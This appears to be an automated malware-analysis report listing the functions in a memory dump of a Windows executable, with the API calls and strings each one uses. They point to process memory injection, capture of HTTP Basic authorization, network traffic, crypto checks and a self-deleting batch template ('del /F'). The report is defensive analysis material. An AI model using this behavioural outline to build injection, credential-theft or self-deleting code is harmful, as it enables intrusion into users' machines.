GetLastError.KERNEL32(?,00CCBA1E), ref: 00CD5AD6
TlsSetValue.KERNEL32(00000000), ref: 00CD5AE6
SetLastError.KERNEL32(?,?,00CCBA1E), ref: 00CD5AED

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE0181, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 91

APIs

Part of subcall function 00CF3CFF: StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00CF3D14
Part of subcall function 00CF3CFF: lstrcmpA.KERNEL32(Basic ,?,00CE01C0,00000006,Authorization,?,?,?), ref: 00CF3D1E

StrChrA.SHLWAPI(?,0000003A), ref: 00CE0212

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Strings

Authorization, xrefs: 00CE0191
Basic , xrefs: 00CE01B6

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCA509, Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 66

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CCA54A

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

PathRenameExtensionW.SHLWAPI(?,?), ref: 00CCA59B

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CCA56B

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCBBAD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 46

APIs

Part of subcall function 00CCB6D0: EnterCriticalSection.KERNEL32(00D03510,?,00CCBBBB,00F51E90,?,00CD1983,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CCB6E0
Part of subcall function 00CCB6D0: LeaveCriticalSection.KERNEL32(00D03510,?,00CD1983,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CCB715

VerQueryValueW.VERSION(?,00CC75E4,?,?,00F51E90,?,00CD1983,?,?,?,?,?,?,00CE48EB), ref: 00CCBBCE
GetModuleHandleW.KERNEL32(?), ref: 00CCBC0F

Part of subcall function 00CCBC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00CCBC6B

Strings

4, xrefs: 00CCBBD9

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE46CB, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 34

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CE470E

Part of subcall function 00CF3D5A: memcpy.MSVCRT ref: 00CF3D94

Part of subcall function 00CE4214: EnterCriticalSection.KERNEL32(00D03510,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CE422E
Part of subcall function 00CE4214: LeaveCriticalSection.KERNEL32(00D03510,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CE4261
Part of subcall function 00CE4214: CoTaskMemFree.OLE32(00000000), ref: 00CE42F6
Part of subcall function 00CE4214: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4303
Part of subcall function 00CE4214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CE431A

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CE46D9
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CE46EE

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD93E9, Relevance: 6.2, APIs: 4, Instructions: 70

APIs

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

SetLastError.KERNEL32(00000008,00003A98,?,00000000,00CD9326,?,?,00000000), ref: 00CD9412
memcpy.MSVCRT ref: 00CD9432
memcpy.MSVCRT ref: 00CD946A
memcpy.MSVCRT ref: 00CD9482

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD1BDD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 17

APIs

#6.OLEAUT32 ref: 00CD1BE7
#2.OLEAUT32(ProhibitDTD), ref: 00CD1BF5

Strings

ProhibitDTD, xrefs: 00CD1BF0

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCF20B, Relevance: 6.2, APIs: 4, Instructions: 63

APIs

memset.MSVCRT ref: 00CCF219
memcpy.MSVCRT ref: 00CCF23A
memcpy.MSVCRT ref: 00CCF260
memcpy.MSVCRT ref: 00CCF284

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF1E96, Relevance: 6.2, APIs: 4, Instructions: 60

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00CCCAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00CF1E9C
memcmp.MSVCRT ref: 00CF1EC8
memcpy.MSVCRT ref: 00CF1F13
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00CF1F1F

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE1215, Relevance: 6.2, APIs: 4, Instructions: 38

APIs

memset.MSVCRT ref: 00CE122B
InitializeCriticalSection.KERNEL32(00D02910), ref: 00CE123B

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

memset.MSVCRT ref: 00CE126A
InitializeCriticalSection.KERNEL32(00D028F0), ref: 00CE1274

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDBFCE, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 141

APIs

memcpy.MSVCRT ref: 00CDC0ED
GetLastError.KERNEL32(?,?,?,?,?,?,00000001,?,00000000,00000000), ref: 00CDC10C

Part of subcall function 00CCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

Part of subcall function 00CDCC9C: SetLastError.KERNEL32(00000008,00001000,?,?,?,00000001,?,?,?,?,?,00000000,?,?,00000001), ref: 00CDCDAF

Part of subcall function 00CD5A9B: GetLastError.KERNEL32(?,00000000,00CDC683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00CD5A9D
Part of subcall function 00CD5A9B: TlsGetValue.KERNEL32(?,?,00000000), ref: 00CD5ABA
Part of subcall function 00CD5A9B: SetLastError.KERNEL32(?,?,00000000,00CDC683,?,00000000,00000000,?,00000001,?,00000000,00000000,?,?,?,00000000), ref: 00CD5ACA

Part of subcall function 00CD5A4F: GetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A51
Part of subcall function 00CD5A4F: TlsGetValue.KERNEL32(?,?,00CCB9B4), ref: 00CD5A6E
Part of subcall function 00CD5A4F: TlsSetValue.KERNEL32(00000001), ref: 00CD5A80
Part of subcall function 00CD5A4F: SetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A90

Part of subcall function 00CD5AD5: GetLastError.KERNEL32(?,00CCBA1E), ref: 00CD5AD6
Part of subcall function 00CD5AD5: TlsSetValue.KERNEL32(00000000), ref: 00CD5AE6
Part of subcall function 00CD5AD5: SetLastError.KERNEL32(?,?,00CCBA1E), ref: 00CD5AED

Part of subcall function 00CD7DF0: EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00CCB9D5,00000003,?,00000000,00000000), ref: 00CD7E07
Part of subcall function 00CD7DF0: InterlockedIncrement.KERNEL32(?,?), ref: 00CD7E5B
Part of subcall function 00CD7DF0: LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00CCB9D5,00000003,?,00000000,00000000), ref: 00CD7E62

Part of subcall function 00CD7E75: EnterCriticalSection.KERNEL32(00F5267C,00F52668,00000001,?,00F52668,00CDC026,00000001,?), ref: 00CD7E8F
Part of subcall function 00CD7E75: LeaveCriticalSection.KERNEL32(00F5267C,?,?,?), ref: 00CD7EBE

Strings

d, xrefs: 00CDBFE8
n, xrefs: 00CDBFF5

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9067, Relevance: 6.1, APIs: 4, Instructions: 89

APIs

memset.MSVCRT ref: 00CD908C

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

InternetReadFile.WININET(00CD388E,?,00001000,?), ref: 00CD90DE
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00CD90BB

Part of subcall function 00CD6AAB: memcpy.MSVCRT ref: 00CD6AD1

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

SetLastError.KERNEL32(00000000,?,00001000,?,?,00000000,?,00000001,?,00CD388E,?,00000CCA,?,?,00000001), ref: 00CD9132

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD72C2, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00CF3993: memcpy.MSVCRT ref: 00CF3AA4

Part of subcall function 00CCE524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CCE534

WriteFile.KERNEL32(?,?,00000005,?,00000000), ref: 00CD732F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CD7347
FlushFileBuffers.KERNEL32(?), ref: 00CD7361
SetEndOfFile.KERNEL32 ref: 00CD737B

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CCE4F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00CCE502

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF5A2D, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

GetTempFileNameW.KERNEL32(00000426,?,?,?), ref: 00CF5A84
PathFindFileNameW.SHLWAPI(?), ref: 00CF5A93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00CF5ACC
memcpy.MSVCRT ref: 00CF5AF1

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEFC7C, Relevance: 6.1, APIs: 4, Instructions: 77

APIs

GetTickCount.KERNEL32 ref: 00CEFC87
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000002), ref: 00CEFC99
memcmp.MSVCRT ref: 00CEFCD3
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 00CEFD3F

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2F53, Relevance: 6.1, APIs: 4, Instructions: 74

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00CF2F68
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00CF2F9D
WSAEventSelect.WS2_32 ref: 00CF2FEB
WSASetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?), ref: 00CF2FFE

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCE141, Relevance: 6.1, APIs: 4, Instructions: 65

APIs

GlobalLock.KERNEL32 ref: 00CCE16A
EnterCriticalSection.KERNEL32(?,000000FF,00000000), ref: 00CCE1A6

Part of subcall function 00CCDE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00CCE138,?,?,?,?,?,00000009,00000000), ref: 00CCDE7E
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDEEF
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDF13
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDF2A
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDF4A
Part of subcall function 00CCDE64: LeaveCriticalSection.KERNEL32 ref: 00CCDF65

LeaveCriticalSection.KERNEL32(?,?,00CC7854,?,000000FF,00000000), ref: 00CCE1CC

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

GlobalUnlock.KERNEL32 ref: 00CCE1D3

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF06B6, Relevance: 6.1, APIs: 4, Instructions: 59

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 00CF06D4
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000103,00000000,?,?), ref: 00CF0709
RegCloseKey.ADVAPI32(?), ref: 00CF0718
RegCloseKey.ADVAPI32(?), ref: 00CF0733

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEFBE9, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,00CEFEB0,?,?,?,?,00000002), ref: 00CEFBF4
GetTickCount.KERNEL32 ref: 00CEFC27
memcpy.MSVCRT ref: 00CEFC60
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00CEFEB0,?,?,?,?,00000002), ref: 00CEFC6C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCC86A, Relevance: 6.1, APIs: 4, Instructions: 52

APIs

Part of subcall function 00CCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

DeleteCriticalSection.KERNEL32(?,?,?,?,00CCC856), ref: 00CCC8C2

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

CloseHandle.KERNEL32 ref: 00CCC8DA
DeleteCriticalSection.KERNEL32(?,?,?,?,?,00CCC856), ref: 00CCC8E7
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00CCC856), ref: 00CCC8F0

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCAA04, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetTickCount.KERNEL32 ref: 00CCAA11
GetLastInputInfo.USER32(?), ref: 00CCAA24
GetLocalTime.KERNEL32(?), ref: 00CCAA48

Part of subcall function 00CED979: SystemTimeToFileTime.KERNEL32(?,?), ref: 00CED983

GetTimeZoneInformation.KERNEL32(?), ref: 00CCAA60

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD2F57, Relevance: 6.0, APIs: 4, Instructions: 39

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 00CD2F6C
TranslateMessage.USER32(?), ref: 00CD2F90
DispatchMessageW.USER32(?), ref: 00CD2F9B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CD2FAB

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDE1B7, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

Part of subcall function 00CD568C: TlsSetValue.KERNEL32(00000001,00CD638A), ref: 00CD5699

Part of subcall function 00CEBEE3: CreateMutexW.KERNEL32(00D02974,00000000,?), ref: 00CEBF05

Part of subcall function 00CE4B8D: WaitForSingleObject.KERNEL32(00000000,00CD63B6), ref: 00CE4B95

GetCurrentThread.KERNEL32 ref: 00CDE1DF
SetThreadPriority.KERNEL32 ref: 00CDE1E6
WaitForSingleObject.KERNEL32(00001388), ref: 00CDE1F8

Part of subcall function 00CF4181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CF41A1
Part of subcall function 00CF4181: Process32FirstW.KERNEL32(?,?), ref: 00CF41C6
Part of subcall function 00CF4181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00CF421D
Part of subcall function 00CF4181: CloseHandle.KERNEL32 ref: 00CF423B
Part of subcall function 00CF4181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00CF4257
Part of subcall function 00CF4181: memcmp.MSVCRT ref: 00CF426F
Part of subcall function 00CF4181: CloseHandle.KERNEL32(?), ref: 00CF42E7
Part of subcall function 00CF4181: Process32NextW.KERNEL32(?,?), ref: 00CF42F3
Part of subcall function 00CF4181: CloseHandle.KERNEL32 ref: 00CF4306

WaitForSingleObject.KERNEL32(00001388), ref: 00CDE211

Part of subcall function 00CD2FB7: ReleaseMutex.KERNEL32 ref: 00CD2FBB
Part of subcall function 00CD2FB7: CloseHandle.KERNEL32 ref: 00CD2FC2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCDE15, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 00CCDE25
EnterCriticalSection.KERNEL32(?,?,00007530), ref: 00CCDE33
LeaveCriticalSection.KERNEL32(?,?,00007530), ref: 00CCDE48
WaitForSingleObject.KERNEL32(?,00007530), ref: 00CCDE52

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF13F4, Relevance: 6.0, APIs: 3, Instructions: 50

APIs

getpeername.WS2_32(?,?,?), ref: 00CF1418
getsockname.WS2_32(?,?,?), ref: 00CF1430
send.WS2_32(00000000,?,00000008,00000000), ref: 00CF1461

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6C17, Relevance: 6.0, APIs: 3, Instructions: 30

APIs

socket.WS2_32(?,00000001,00000006), ref: 00CD6C23
connect.WS2_32 ref: 00CD6C40
closesocket.WS2_32 ref: 00CD6C4B

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE4CA0, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 79

APIs

memcpy.MSVCRT ref: 00CE4CC6

Part of subcall function 00CD0243: CryptDestroyKey.ADVAPI32 ref: 00CD025A
Part of subcall function 00CD0243: CryptImportKey.ADVAPI32(?,?,00000114,00000000,00000000), ref: 00CD0278

memset.MSVCRT ref: 00CE4D69

Part of subcall function 00CD028F: CryptGetKeyParam.ADVAPI32(?,00000009,?,?,00000000), ref: 00CD02B0

Part of subcall function 00CC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00CC9ACA
Part of subcall function 00CC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00CC9AEF

Part of subcall function 00CD02CE: CryptVerifySignatureW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000114,?,00CE4D47), ref: 00CD031F

Part of subcall function 00CD0223: CryptDestroyKey.ADVAPI32 ref: 00CD0235

Strings

\26}, xrefs: 00CE4CBE

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEBE5A, Relevance: 5.8, APIs: 3, Instructions: 36

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

Part of subcall function 00CEBAD3: memcpy.MSVCRT ref: 00CEBAEE
Part of subcall function 00CEBAD3: StringFromGUID2.OLE32(?), ref: 00CEBB92

CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CEBEA0
GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00CEBEAC
CloseHandle.KERNEL32 ref: 00CEBEBA

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2917, Relevance: 5.8, APIs: 3, Instructions: 30

APIs

WSACreateEvent.WS2_32(00000000,?,00CF2C15,?,00000000,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF292D
WSAEventSelect.WS2_32(?,?,00CF2CD1), ref: 00CF2943
WSACloseEvent.WS2_32(?), ref: 00CF2957

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEC3E0, Relevance: 5.7, APIs: 3, Instructions: 40

APIs

lstrlenW.KERNEL32(00CC7C5C), ref: 00CEC3FC
lstrlenW.KERNEL32(?), ref: 00CEC402

Part of subcall function 00CD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43
Part of subcall function 00CD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

memcpy.MSVCRT ref: 00CEC426

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE65F4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 138

APIs

Part of subcall function 00CE65A9: StrCmpNIA.SHLWAPI ref: 00CE65C0

StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00CE675C

Strings

script, xrefs: 00CE6669 00CE6693
nbsp;, xrefs: 00CE6754

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD7058, Relevance: 5.7, APIs: 3, Instructions: 82

APIs

Part of subcall function 00CDDCF8: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00CDDD10
Part of subcall function 00CDDCF8: CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00CDDD24
Part of subcall function 00CDDCF8: CloseHandle.KERNEL32 ref: 00CDDD37

GetFileSizeEx.KERNEL32(00000000,?), ref: 00CD708F

Part of subcall function 00CDDD44: UnmapViewOfFile.KERNEL32 ref: 00CDDD50
Part of subcall function 00CDDD44: MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,00000000), ref: 00CDDD67

Part of subcall function 00CCE524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CCE534

SetEndOfFile.KERNEL32 ref: 00CD7105
FlushFileBuffers.KERNEL32(?), ref: 00CD7110

Part of subcall function 00CCE348: CloseHandle.KERNEL32 ref: 00CCE354

Part of subcall function 00CCE56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CCE594

Part of subcall function 00CD6F3F: GetFileAttributesW.KERNEL32(?), ref: 00CD6F50
Part of subcall function 00CD6F3F: PathRemoveFileSpecW.SHLWAPI(?), ref: 00CD6F85
Part of subcall function 00CD6F3F: MoveFileExW.KERNEL32(?,?,00000001), ref: 00CD6FCC
Part of subcall function 00CD6F3F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00CD6FE5
Part of subcall function 00CD6F3F: Sleep.KERNEL32(00001388), ref: 00CD7028
Part of subcall function 00CD6F3F: FlushFileBuffers.KERNEL32 ref: 00CD7036

Part of subcall function 00CDDCB8: UnmapViewOfFile.KERNEL32 ref: 00CDDCC4
Part of subcall function 00CDDCB8: CloseHandle.KERNEL32 ref: 00CDDCD7
Part of subcall function 00CDDCB8: CloseHandle.KERNEL32 ref: 00CDDCED

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6B66, Relevance: 5.7, APIs: 2, Instructions: 57

APIs

select.WS2_32(00000000,?,00000000,00000000), ref: 00CD6BC5
recv.WS2_32(?,?,?,00000000), ref: 00CD6BD5

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD072F, Relevance: 5.7, APIs: 3, Instructions: 56

APIs

GetCurrentThreadId.KERNEL32 ref: 00CD0730
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00CD0767

Part of subcall function 00CD0643: memset.MSVCRT ref: 00CD0654

Part of subcall function 00CD03FD: GetCurrentProcess.KERNEL32 ref: 00CD0400
Part of subcall function 00CD03FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00CD0421
Part of subcall function 00CD03FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 00CD042A

ResumeThread.KERNEL32(?), ref: 00CD07A8

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE589C, Relevance: 5.6, APIs: 3, Instructions: 50

APIs

EnterCriticalSection.KERNEL32(00D03510,?,00000001,?,?,00CE5AB4,?,?,?,00000001), ref: 00CE58B8
LeaveCriticalSection.KERNEL32(00D03510,?,?,00CE5AB4,?,?,?,00000001), ref: 00CE58DF

Part of subcall function 00CE575A: memset.MSVCRT ref: 00CE5774
Part of subcall function 00CE575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE57BA

Part of subcall function 00CC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00CC9ACA
Part of subcall function 00CC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00CC9AEF

Part of subcall function 00CC9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00CC9B41

_ultow.MSVCRT ref: 00CE5926

Part of subcall function 00CC9A2A: CryptDestroyHash.ADVAPI32 ref: 00CC9A42
Part of subcall function 00CC9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CC9A53

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CED7AE, Relevance: 5.6, APIs: 3, Instructions: 47

APIs

CloseHandle.KERNEL32(?), ref: 00CED7BF

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

InternetQueryOptionA.WININET(?,00000015,?,?), ref: 00CED7FF
InternetCloseHandle.WININET(?), ref: 00CED80A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE45AE, Relevance: 5.6, APIs: 3, Instructions: 44

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE45D1
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE45E9
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00CE4604

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF3629, Relevance: 5.6, APIs: 3, Instructions: 43

APIs

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00CF363C
GetLastError.KERNEL32(?,00CD5032,?,00000008,?,?,?,?,?,?,00CE49E1,?,?,00000001), ref: 00CF3646

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00CF366E

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD500E, Relevance: 5.6, APIs: 3, Instructions: 41

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00CD5020

Part of subcall function 00CF3629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00CF363C
Part of subcall function 00CF3629: GetLastError.KERNEL32(?,00CD5032,?,00000008,?,?,?,?,?,?,00CE49E1,?,?,00000001), ref: 00CF3646
Part of subcall function 00CF3629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00CF366E

GetTokenInformation.ADVAPI32(?,0000000C,00D02968,00000004,?), ref: 00CD5048

